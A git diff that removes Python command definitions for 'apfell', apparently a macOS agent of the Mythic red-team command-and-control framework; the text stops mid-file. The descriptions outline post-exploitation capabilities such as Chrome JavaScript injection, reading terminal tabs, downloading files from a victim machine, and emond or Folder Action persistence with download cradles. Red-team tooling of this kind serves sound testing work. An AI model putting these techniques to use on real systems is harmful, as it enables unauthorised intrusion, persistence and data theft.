-from MythicResponseRPC import * - - -class CdArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "path": CommandParameter( - name="path", - type=ParameterType.String, - description="path to change directory to", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.args["path"].value = self.command_line - else: - self.args["path"].value = "." - - -class CdCommand(CommandBase): - cmd = "cd" - needs_admin = False - help_cmd = "cd [path]" - description = "Change the current working directory to another directory. No quotes are necessary and relative paths are fine" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - argument_class = CdArguments - attackmapping = ["T1083"] - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="fileManager.changeCurrentDirectoryPath", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/chrome_bookmarks.py b/Payload_Types/apfell/mythic/agent_functions/chrome_bookmarks.py deleted file mode 100644 index cc065ddb0..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/chrome_bookmarks.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ChromeBookmarksArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ChromeBookmarksCommand(CommandBase): - cmd = "chrome_bookmarks" - needs_admin = False - help_cmd = "chrome_bookmarks" - description = "This uses AppleEvents to list information about all of the bookmarks in Chrome. If Chrome is not currently running, this will launch Chrome (potential OPSEC issue) and might have a conflict with trying to access Chrome's bookmarks as Chrome is starting. It's recommended to not use this unless Chrome is already running. Use the list_apps function to check if Chrome is running. In Mojave this will cause a popup the first time asking for permission for your process to access Chrome" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1217"] - argument_class = ChromeBookmarksArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of Chrome", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/chrome_js.py b/Payload_Types/apfell/mythic/agent_functions/chrome_js.py deleted file mode 100644 index 2df9c201d..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/chrome_js.py +++ /dev/null @@ -1,61 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ChromeJsArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "window": CommandParameter( - name="window", - type=ParameterType.Number, - description="Window # from chrome_tabs", - ), - "javascript": CommandParameter( - name="javascript", - type=ParameterType.String, - description="javascript to execute", - ), - "tab": CommandParameter( - name="tab", - type=ParameterType.Number, - description="Tab # from chrome_tabs", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class ChromeJsCommand(CommandBase): - cmd = "chrome_js" - needs_admin = False - help_cmd = "chrome_js" - description = "This uses AppleEvents to execute the specified JavaScript code into a specific browser tab. The chrome_tabs function will specify for each tab the window/tab numbers that you can use for this function. Note: by default this ability is disabled in Chrome now, you will need to go to view->Developer->Allow JavaScript from Apple Events." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1106", "T1064"] - argument_class = ChromeJsArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of Chrome", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/chrome_tabs.py b/Payload_Types/apfell/mythic/agent_functions/chrome_tabs.py deleted file mode 100644 index 7a42f9387..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/chrome_tabs.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ChromeTabsArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ChromeTabsCommand(CommandBase): - cmd = "chrome_tabs" - needs_admin = False - help_cmd = "chrome_tabs" - description = "This uses AppleEvents to list information about all of the open tabs in all of the open Chrome instances. If Chrome is not currently running, this will launch Chrome (potential OPSEC issue) and might have a conflict with trying to access Chrome tabs as Chrome is starting. It's recommended to not use this unless Chrome is already running. Use the list_apps function to check if Chrome is running. In Mojave this will cause a popup the first time asking for permission for your process to access Chrome." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1010"] - argument_class = ChromeTabsArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of Chrome", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/clipboard.py b/Payload_Types/apfell/mythic/agent_functions/clipboard.py deleted file mode 100644 index 0f95811eb..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/clipboard.py +++ /dev/null @@ -1,64 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ClipboardArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "types": CommandParameter( - name="Clipboard Types", - type=ParameterType.Array, - required=False, - default_value=["public.utf8-plain-text"], - description="Types of clipboard data to retrieve, defaults to public.utf8-plain-text", - ), - "data": CommandParameter( - name="data", - type=ParameterType.String, - description="Data to put on the clipboard", - required=False, - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("data", self.command_line) - - -class ClipboardCommand(CommandBase): - cmd = "clipboard" - needs_admin = False - help_cmd = "clipboard [data]" - description = "Get all the types of contents on the clipboard, return specific types, or set the contents of the clipboard. Root has no clipboard!" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1115"] - argument_class = ClipboardArguments - browser_script = BrowserScript(script_name="clipboard", author="@its_a_feature_") - - async def create_tasking(self, task: MythicTask) -> MythicTask: - if task.args.get_arg("data") != "": - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSPasteboard.generalPasteboard.setStringForType", - artifact_type="API Called", - ) - else: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSPasteboard.generalPasteboard.dataForType", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/current_user.py b/Payload_Types/apfell/mythic/agent_functions/current_user.py deleted file mode 100644 index 0258d8187..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/current_user.py +++ /dev/null @@ -1,60 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class CurrentUserArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "method": CommandParameter( - name="method", - type=ParameterType.ChooseOne, - choices=["api", "jxa"], - description="Use AppleEvents or ObjectiveC calls to get user information", - default_value="api", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("method", self.command_line) - else: - raise ValueError("Missing arguments") - pass - - -class CurrentUserCommand(CommandBase): - cmd = "current_user" - needs_admin = False - help_cmd = "current_user" - description = "This uses AppleEvents or ObjectiveC APIs to get information about the current user." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1033"] - argument_class = CurrentUserArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - if task.args.get_arg("method") == "jxa": - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of System Events", - artifact_type="AppleEvent Sent", - ) - else: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="NSUserName, NSFullUserName, NSHomeDirectory", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/download.py b/Payload_Types/apfell/mythic/agent_functions/download.py deleted file mode 100644 index fcfff9bf3..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/download.py +++ /dev/null @@ -1,49 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class DownloadArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - temp_json = json.loads(self.command_line) - if "host" in temp_json: - # this means we have tasking from the file browser rather than the popup UI - # the apfell agent doesn't currently have the ability to do _remote_ listings, so we ignore it - self.command_line = temp_json["path"] + "/" + temp_json["file"] - else: - raise Exception("Unsupported JSON") - - -class DownloadCommand(CommandBase): - cmd = "download" - needs_admin = False - help_cmd = "download {path to remote file}" - description = "Download a file from the victim machine to the Mythic server in chunks (no need for quotes in the path)." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = True - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - parameters = [] - attackmapping = ["T1020", "T1030", "T1041"] - argument_class = DownloadArguments - browser_script = BrowserScript(script_name="download", author="@its_a_feature_") - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSFileHandle.fileHandleForReadingAtPath, readDataOfLength", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/exit.py b/Payload_Types/apfell/mythic/agent_functions/exit.py deleted file mode 100644 index 9ed3273f3..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/exit.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ExitArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ExitCommand(CommandBase): - cmd = "exit" - needs_admin = False - help_cmd = "exit" - description = "This exits the current apfell agent by leveraging the ObjectiveC bridge's NSApplication terminate function." - version = 1 - is_exit = True - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = ExitArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSApplication.sharedApplication.terminate", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/get_config.py b/Payload_Types/apfell/mythic/agent_functions/get_config.py deleted file mode 100644 index 049600e50..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/get_config.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class GetConfigArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class GetConfigCommand(CommandBase): - cmd = "get_config" - needs_admin = False - help_cmd = "get_config" - description = "Gets the current running config via the C2 class" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1082"] - argument_class = GetConfigArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSProcessInfo.processInfo.*, $.NSHost.currentHost.*", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/hostname.py b/Payload_Types/apfell/mythic/agent_functions/hostname.py deleted file mode 100644 index 52c6ed543..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/hostname.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class HostnameArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class HostnameCommand(CommandBase): - cmd = "hostname" - needs_admin = False - help_cmd = "hostname" - description = "Get the various hostnames associated with the host, including the NETBIOS name if the computer is domain joined" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = HostnameArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSHost.currentHost.names", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/ifconfig.py b/Payload_Types/apfell/mythic/agent_functions/ifconfig.py deleted file mode 100644 index 873f3e4d7..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/ifconfig.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class IfconfigArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class IfconfigCommand(CommandBase): - cmd = "ifconfig" - needs_admin = False - help_cmd = "ifconfig" - description = "Return all the IP addresses associated with the host" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = IfconfigArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSHost.currentHost.addresses", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/iterm.py b/Payload_Types/apfell/mythic/agent_functions/iterm.py deleted file mode 100644 index 8bbe8ee36..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/iterm.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ITermArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ITermCommand(CommandBase): - cmd = "iTerm" - needs_admin = False - help_cmd = "iTerm" - description = "Read the contents of all open iTerm tabs if iTerms is open, otherwise just inform the operator that it's not currently running" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1139", "T1056"] - argument_class = ITermArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of iTerm", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/jscript.py b/Payload_Types/apfell/mythic/agent_functions/jscript.py deleted file mode 100644 index 4929ad07a..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/jscript.py +++ /dev/null @@ -1,47 +0,0 @@ -from CommandBase import * -import json - - -class JscriptArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "command": CommandParameter( - name="command", - type=ParameterType.String, - description="The JXA command to execute", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("command", self.command_line) - else: - raise ValueError("Missing arguments") - pass - - -class JscriptCommand(CommandBase): - cmd = "jscript" - needs_admin = False - help_cmd = "jscript {command}" - description = "This runs the JavaScript command, {command}, and returns its output via an eval(). The output will get passed through ObjC.deepUnwrap to parse out basic data types from ObjectiveC and get strings back" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1064"] - argument_class = JscriptArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/jsimport.py b/Payload_Types/apfell/mythic/agent_functions/jsimport.py deleted file mode 100644 index 758380008..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/jsimport.py +++ /dev/null @@ -1,58 +0,0 @@ -from CommandBase import * -from MythicFileRPC import * -import json - - -class JsimportArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "file": CommandParameter( - name="file", - type=ParameterType.File, - description="Select a JXA file to upload", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - pass - - -class JsimportCommand(CommandBase): - cmd = "jsimport" - needs_admin = False - help_cmd = "jsimport" - description = "import a JXA file into memory. Only one can be imported at a time." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = JsimportArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - original_file_name = json.loads(task.original_params)["file"] - response = await MythicFileRPC(task).register_file( - file=task.args.get_arg("file"), - saved_file_name=original_file_name, - delete_after_fetch=True, - ) - if response.status == MythicStatus.Success: - task.args.add_arg("file", response.agent_file_id) - else: - raise Exception("Error from Mythic: " + response.error_message) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/jsimport_call.py b/Payload_Types/apfell/mythic/agent_functions/jsimport_call.py deleted file mode 100644 index 104cc9c19..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/jsimport_call.py +++ /dev/null @@ -1,47 +0,0 @@ -from CommandBase import * -import json - - -class JsimportCallArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "command": CommandParameter( - name="command", - type=ParameterType.String, - description="The command to execute within a file loaded via jsimport", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("command", self.command_line) - else: - raise ValueError("Missing arguments") - pass - - -class JsimportCallCommand(CommandBase): - cmd = "jsimport_call" - needs_admin = False - help_cmd = "jsimport_call function_call();" - description = "call a function from within the JS file that was imported with 'jsimport'. This function call is appended to the end of the jsimport code and called via eval." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1155", "T1064"] - argument_class = JsimportCallArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/launchapp.py b/Payload_Types/apfell/mythic/agent_functions/launchapp.py deleted file mode 100644 index 9db225720..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/launchapp.py +++ /dev/null @@ -1,54 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class LaunchAppArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "bundle": CommandParameter( - name="bundle", - type=ParameterType.String, - description="The Bundle name to launch", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("bundle", self.command_line) - else: - raise ValueError("Missing arguments") - pass - - -class LaunchAppCommand(CommandBase): - cmd = "launchapp" - needs_admin = False - help_cmd = "launchapp {bundle name}" - description = "This uses the Objective C bridge to launch the specified app asynchronously and 'hidden' (it'll still show up in the dock for now). An example of the bundle name is 'com.apple.itunes' for launching iTunes." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = LaunchAppArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="xpcproxy {}".format( - task.args.get_arg("bundle"), - ), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/list_apps.py b/Payload_Types/apfell/mythic/agent_functions/list_apps.py deleted file mode 100644 index 70215cf3d..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/list_apps.py +++ /dev/null @@ -1,40 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ListAppsArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ListAppsCommand(CommandBase): - cmd = "list_apps" - needs_admin = False - help_cmd = "list_apps" - description = "This uses NSApplication.RunningApplications api to get information about running applications." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = True - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1057"] - argument_class = ListAppsArguments - browser_script = BrowserScript(script_name="list_apps", author="@its_a_feature_") - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSWorkspace.sharedWorkspace.runningApplications", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/list_users.py b/Payload_Types/apfell/mythic/agent_functions/list_users.py deleted file mode 100644 index 96042dfe0..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/list_users.py +++ /dev/null @@ -1,67 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ListUsersArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "gid": CommandParameter( - name="gid", - type=ParameterType.Number, - required=False, - default_value=-1, - description="Enumerate users in a specific group or -1 for all groups", - ), - "groups": CommandParameter( - name="groups", - type=ParameterType.Boolean, - required=False, - default_value=False, - description="Enumerate groups and their members ", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - pass - - -class ListUsersCommand(CommandBase): - cmd = "list_users" - needs_admin = False - help_cmd = 'list_users' - description = "This uses JXA to list the non-service user accounts on the system. You can specify a GID to look at the users of a certain group or you can specify 'groups' to be true and enumerate users by groups" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1087", "T1069"] - argument_class = ListUsersArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - if task.args.get_arg("gid") < 0: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.CSGetLocalIdentityAuthority, $.CSIdentityQueryCreate, $.CSIdentityQueryExecute", - artifact_type="API Called", - ) - else: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.CBIdentityAuthority.defaultIdentityAuthority, $.CBGroupIdentity.groupIdentityWithPosixGIDAuthority", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/load.py b/Payload_Types/apfell/mythic/agent_functions/load.py deleted file mode 100644 index 132f434b4..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/load.py +++ /dev/null @@ -1,54 +0,0 @@ -from CommandBase import * -import json -from MythicFileRPC import * - - -class LoadArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - if len(self.command_line) == 0: - raise ValueError("Need to specify commands to load") - pass - - -class LoadCommand(CommandBase): - cmd = "load" - needs_admin = False - help_cmd = "load cmd1 cmd2 cmd3..." - description = "This loads new functions into memory via the C2 channel." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - parameters = [] - attackmapping = ["T1030", "T1129"] - argument_class = LoadArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - total_code = "" - for cmd in task.args.command_line.split(" "): - cmd = cmd.strip() - try: - code_path = self.agent_code_path / "{}.js".format(cmd) - total_code += open(code_path, "r").read() + "\n" - except Exception as e: - raise Exception("Failed to find code for '{}'".format(cmd)) - resp = await MythicFileRPC(task).register_file( - total_code.encode(), delete_after_fetch=True - ) - if resp.status == MythicStatus.Success: - task.args.add_arg("file_id", resp.agent_file_id) - task.args.add_arg("cmds", task.args.command_line) - else: - raise Exception("Failed to register file: " + resp.error_message) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/ls.py b/Payload_Types/apfell/mythic/agent_functions/ls.py deleted file mode 100644 index 9cc2c5f34..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/ls.py +++ /dev/null @@ -1,58 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class LsArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "path": CommandParameter( - name="path", - type=ParameterType.String, - default_value=".", - description="Path of file or folder on the current system to list", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - temp_json = json.loads(self.command_line) - if "host" in temp_json: - # this means we have tasking from the file browser rather than the popup UI - # the apfell agent doesn't currently have the ability to do _remote_ listings, so we ignore it - self.add_arg("path", temp_json["path"] + "/" + temp_json["file"]) - self.add_arg("file_browser", "true") - else: - self.add_arg("path", temp_json["path"]) - else: - self.add_arg("path", self.command_line) - - -class LsCommand(CommandBase): - cmd = "ls" - needs_admin = False - help_cmd = "ls /path/to/file" - description = "Get attributes about a file and display it to the user via API calls. No need for quotes and relative paths are fine" - version = 1 - is_exit = False - is_file_browse = True - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1106", "T1083"] - argument_class = LsArguments - browser_script = BrowserScript(script_name="ls", author="@its_a_feature_") - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="fileManager.attributesOfItemAtPathError, fileManager.contentsOfDirectoryAtPathError", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/persist_emond.py b/Payload_Types/apfell/mythic/agent_functions/persist_emond.py deleted file mode 100644 index e59761615..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/persist_emond.py +++ /dev/null @@ -1,69 +0,0 @@ -from CommandBase import * -import json - - -class PersistEmondArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "rule_name": CommandParameter( - name="rule_name", - type=ParameterType.String, - description="Rule name for inside of the plist", - ), - "payload_type": CommandParameter( - name="payload_type", - type=ParameterType.ChooseOne, - choices=["oneliner-jxa", "custom_bash-c"], - ), - "url": CommandParameter( - name="url", - type=ParameterType.String, - description="url of payload for oneliner-jxa for download cradle", - required=False, - ), - "command": CommandParameter( - name="command", - type=ParameterType.String, - required=False, - description="Command if type is custom_bash-c to execute via /bin/bash -c", - ), - "file_name": CommandParameter( - name="file_name", - type=ParameterType.String, - description="Name of plist in /etc/emond.d/rules/", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("missing JSON arguments") - else: - raise ValueError("Missing arguments") - pass - - -class PersistEmondCommand(CommandBase): - cmd = "persist_emond" - needs_admin = False - help_cmd = "persist_emond" - description = "Create persistence with an emond plist file in /etc/emond.d/rules/ and a .DS_Store file to trigger it" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1150"] - argument_class = PersistEmondArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/persist_folderaction.py b/Payload_Types/apfell/mythic/agent_functions/persist_folderaction.py deleted file mode 100644 index c77aa4662..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/persist_folderaction.py +++ /dev/null @@ -1,74 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class PersistFolderactionArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "code": CommandParameter( - name="code", - type=ParameterType.String, - description="osascript code", - required=False, - ), - "url": CommandParameter( - name="url", - required=False, - type=ParameterType.String, - description="http://url.of.host/payload", - ), - "folder": CommandParameter( - name="folder", - type=ParameterType.String, - description="/path/to/folder/to/watch", - ), - "script_path": CommandParameter( - name="script_path", - type=ParameterType.String, - description="/path/to/script/to/create/on/disk", - ), - "language": CommandParameter( - name="language", - type=ParameterType.ChooseOne, - choices=["JavaScript", "AppleScript"], - description="If supplying custom 'code', this is the language", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON argument") - else: - raise ValueError("Missing arguments") - - -class PersistFolderactionCommand(CommandBase): - cmd = "persist_folderaction" - needs_admin = False - help_cmd = "persist_folderaction" - description = "Use Folder Actions to persist a compiled script on disk. You can either specify a 'URL' and automatically do a backgrounding one-liner, or supply your own code and language." - version = 1 - is_exit = 